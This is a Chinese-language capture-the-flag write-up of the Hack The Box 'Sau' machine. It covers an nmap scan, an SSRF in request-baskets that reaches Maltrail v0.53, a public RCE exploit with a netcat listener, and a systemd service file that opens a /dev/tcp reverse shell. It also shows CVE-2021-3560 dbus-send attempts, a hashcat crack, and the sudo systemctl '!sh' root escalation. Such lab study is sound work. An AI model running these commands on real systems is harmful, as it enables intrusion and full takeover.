HTB Sau Maltraill-v0.53 CVE-2021-3560
htb | sau
使用nmap扫描端口
nmap -sV -sC -v -oN Sau 10.10.11.224
# Nmap 7.93 scan initiated Mon Dec 25 08:56:25 2023 as: nmap -sV -sC -v -oN Sau 10.10.11.224
Nmap scan report for 10.10.11.224
Host is up (2.4s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 aa8867d7133d083a8ace9dc4ddf3e1ed (RSA)
| 256 ec2eb105872a0c7db149876495dc8a21 (ECDSA)
|_ 256 b30c47fba2f212ccce0b58820e504336 (ED25519)
80/tcp filtered http
55555/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Mon, 25 Dec 2023 01:00:51 GMT
| Content-Length: 75
| invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Mon, 25 Dec 2023 00:59:27 GMT
| Content-Length: 27
| href="/web">Found.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Mon, 25 Dec 2023 00:59:38 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.93%I=7%D=12/25%Time=6588D3F3%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/html;
SF:\x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Mon,\x2025\x20Dec\x2
SF:02023\x2000:59:27\x20GMT\r\nContent-Length:\x2027\r\n\r\nFound\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\
SF:x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x20
SF:200\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Mon,\x2025\x20Dec\x2
SF:02023\x2000:59:38\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPReques
SF:t,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain
SF:;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request
SF:")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCo
SF:ntent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n
SF:\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400
SF:\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n
SF:Connection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,67,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20
SF:charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(
SF:Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
SF:Request")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\
SF:nContent-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Option
SF:s:\x20nosniff\r\nDate:\x20Mon,\x2025\x20Dec\x202023\x2001:00:51\x20GMT\
SF:r\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20na
SF:me\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}\$
SF:\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Reques
SF:t\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20cl
SF:ose\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 25 09:02:57 2023 -- 1 IP address (1 host up) scanned in 392.40 seconds
访问55555端口发现安装了request-baskets 版本为1.2.1
才爆出request-baskets 1.2.1 ssrf 服务端请求伪造
{
"forward_url": "http://127.0.0.1:80",
"proxy_response": true,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
访问http://10.10.11.224:55555/qiang
在页面中发现是Maltrail v0.53版本
在谷歌搜索相关exp
Maltrail v0.53 exploit
**Maltrail-v0.53-漏洞利用**有RCE漏洞
git clone https://github.com/spookier/Maltrail-v0.53-Exploit.git
cd Maltrail-v0.53-Exploit
python exploit.py 10.10.16.16 55566 http://10.10.11.224:55555/qiang
nc -lnvvp 55566
查看flag是否有sudo权限
ec332b88b8cb2824b742013561c14be1
搜索sudo systemctl提权
编写一个service文件来被systemctl加载
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.16.16/5566 0>&1 2<&1"
[Install]
WantedBy=multi-user.target' > /tmp/reshell.service
但是需要本用户密码,由于我是通过rce反弹的shell没有用户密码
使用python开启临时服务上传linpeas.sh查看本机有什么信息
发现有CVE-2021-3560
git clone https://github.com/hakivvi/CVE-2021-3560.git
cd CVE-2021-3560
gcc -Wall exploit.c -o exploit $(pkg-config --libs --cflags dbus-1)
编译报错Package ‘dbus-1’, required by ‘virtual:world’, not found使用apt安装libdbus-1-dev解决
apt install libdbus-1-dev
目标机报错无法提权
手搓
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:pwn string:"pwn your host" int32:1
0.00user 0.00system 0:00.02elapsed 22%CPU (0avgtext+0avgdata 2876maxresident)k
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:pwn string:"pwn your host" int32:1 & sleep 0.002s ; kill $!
openssl passwd -5 qwertyuiop
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword string:'passwd' string:GoldenEye & sleep 0.008s ; kill $!
手撮失败,sys返回的值为0.002s,改成0.001和改成0.002都创建不了pwn用户,试了无数次,换个方向。
maltrail配置文件在/opt/maltrail/maltrail.conf下发现一串hash
admin:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:0:
使用hsah-identifier验证一下hash类型:SHA-256,Haval-256
使用hashcat爆破hash值为:changeme!
hashcat -m 1400 hash /usr/share/wordlists/rockyou.txt
试了一下用root和puma用户SSH根本就不行,等级为easy的提权费了九牛二虎之力
在其他wp看到这篇提权文章systemctl提权等服务状态显示完毕之后输入!sh就提权成功了,为什么会用trail服务因为sudo-l只有这个服务才能不用输入密码。。。
sudo systemctl status trail.service
!sh
提权成功
abb964dd94c0f8cece8f25814b83c15f